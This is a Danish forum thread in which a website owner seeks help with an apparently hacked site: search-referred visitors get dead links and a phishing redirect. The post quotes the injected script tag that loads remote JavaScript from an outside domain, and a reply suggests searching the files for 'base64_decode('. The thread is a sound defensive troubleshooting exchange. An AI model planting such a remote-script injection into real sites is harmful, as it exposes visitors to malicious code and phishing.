CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg

Log ind eller opret profil

Du kan også logge ind via nedenstående tjenester

Slettet bruger

24. maj 2014 - 11:34 Der er 13 kommentarer og
1 løsning

Mystisk script fryser webside

Hej
Min webside er tilsyneladende blevet hacket eller fjendtligt overtaget, således at når man søger på eks. google og søgeresultatet kommer fra, og man har klikket på det, så kommer siden frem, men alle link på siden er ikke længere aktive. Så man kan ikke rigtig komme videre.

Hvis jeg derimod manuelt skriver sidens navn i webadressefeltet, kommer siden korrekt frem og alle link og funktioner virker ok.

Kildekoden siger, at når der søges via google, at et script har sneget sig ind i koden, dette script:

script src='http://www.buchedan.org/post/ad2.js'></script>

Derimod er scriptet ikke med, når man manuelt skriver sidens navn webadressefeltet.

Er der nogen som har et forslag til hvordan dette er sket og hvordan jeg får det fjernet igen?

mvh. rwj

Synes godt om

TheBlackKnight Novice

24. maj 2014 - 14:09 #1

Hent kildekoden ned på din lokal maskine og brug noget lig Notepad++ til at søge filerne igennem efter "buchedan.org/post/ad2.js" eller "base64_decode(".

Hvis der ikke er noget at finde i filerne, så er det tilføjet til din database.

Den bedte procedure er dog at rulle en backup ud.

Jeg kan ikke sige hvordan angrebet er foretaget, da jeg ikke har nogen ide om hvilket OS, miljø (PHP, Python, Ruby, .NET, ren HTML...) og system (egen kode eller et CMS) du køre.

Har du adgang til system logs?

Synes godt om

Slettet bruger

24. maj 2014 - 14:18 #2

Hej

Tak for svar, og det lyder som en godt idé med at hente koderne og søge på min lokalemaskine, så det gør jeg.

Jeg burde vel have afgang til system log, men er lidt i tvivl om hvad du mener.

Men jeg prøver dit forslag og vender retur.

mvh. rwj

Synes godt om

TheBlackKnight Novice

24. maj 2014 - 14:32 #3

system logs = error, access, application... log filer, som måske kan afsløre hvordan angrebet er foregået.

Synes godt om

Slettet bruger

24. maj 2014 - 14:42 #4

Ok, jeg bruger SharePoint Designer og der er en logfunktion, og den melder ikke om nogen fejl. Så der lærte jeg lidt lidt, tak:-)

Jeg har været igennem alle koderne og databasen uden af finde henvisninger til dette script, så nu er jeg igen totalt blankt.

Er det ikke mærkeligt, at hvis man ikke bruger søgemaskine men taster webadressen ind manuelt, så er der ingen problemer, det er det kun når man bruger søgemaskine.

Kan man forestille sig, at scriptet kommer på ifm med søgemaskinen?

Jeg har ikke megen forstand på dette, sorry:-)

mvh. rwj

Synes godt om

Slettet bruger

24. maj 2014 - 14:48 #5

glemt af oplyse, at problemet kun opstår i Crome, Firefox, Safari og Opera, men derimod ikke i IE, hvis det har nogen betydning eller opklaring for sagen.

Synes godt om

claes57 Ekspert

24. maj 2014 - 15:23 #6

sker det også fra andre maskiner? eller er fejlen på din maskine.

Synes godt om

Slettet bruger

24. maj 2014 - 16:35 #7

Ja, jeg fik det af vide af flere, så det er ikke kun hos mig:-)

mvh. rwj

Synes godt om

claes57 Ekspert

24. maj 2014 - 18:45 #8

Så er vi tilbage ved #1. Uden link til side og/eller oplysninger om kildekoden, så er det rent gætværk.

Synes godt om

Slettet bruger

24. maj 2014 - 19:28 #9

Helt klart, det er umuligt at komme videre uden webadressen, og den er her:

www.design-klip.dk

fortsat god aften.

mvh. rwj

Synes godt om

Slettet bruger

25. maj 2014 - 14:56 #10

nu har omtalte side også fået en besynderlige omdirigering til en phishingside. Kun første gang, prøver man anden gang, så kommer siden frem.

Nogen forslag til løsning af dette problem?

mvh. rwj

Synes godt om

claes57 Ekspert

25. maj 2014 - 15:03 #11

Start med at skifte adgangskode. Og så må du igennem siden opsætning og database manuelt, og fjerne alt du ikke selv står inde for.

Synes godt om

Slettet bruger

25. maj 2014 - 15:09 #12

ok, det må jeg så prøve, tak indtil videre, jeg vender tilbage.

mvh. rwj

Synes godt om

Slettet bruger

25. maj 2014 - 18:04 #13

Jeg har prøvet nogle virus programmer, men har intet fundet.

Har efterfølgnede opdaget, at siden er blevet kapret og puttet i en andens ramme, og derfor er linkene døde.

Jeg har prøvet flere forslag på diverse sider hvordan man undgå af blive kapret og lagt i en anden ramme, men ingen virker.

Er der nogen her som har et forslag?

mvh. rwj

Synes godt om

Slettet bruger

09. juni 2014 - 08:43 #14

lukker, men god sommer til alle eksperter:-)

Synes godt om

Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Følg dette spørgsmål

Opret Preview

Se alle it-kurser fra Computerworld Kurser

IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Se alle it-kurser

Flere spørgsmål fra Virus kategorien

Titel	Indlæg	Oprettet	Seneste aktivitet
Findes der mon et Antivirus program, som ikke, konstant, reklamerer, for at købe ? Af Ikke-ekspert i Virus	21	22/06/202419:22	23/06/202412:54
Anbefaling af antivirusprogram med firewall Af OnePlusFan i Virus	23	07/05/202421:02	13/05/202419:48
trusler Af gerhardpet i Virus	4	26/01/202410:02	27/01/202408:32
Kan ikke fjerne virus Af mik28 i Virus	16	09/01/202416:37	10/01/202419:59
virusscanning Af JetteD i Virus	2	10/11/202312:55	10/11/202316:36

Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten

Seneste artiklerRSS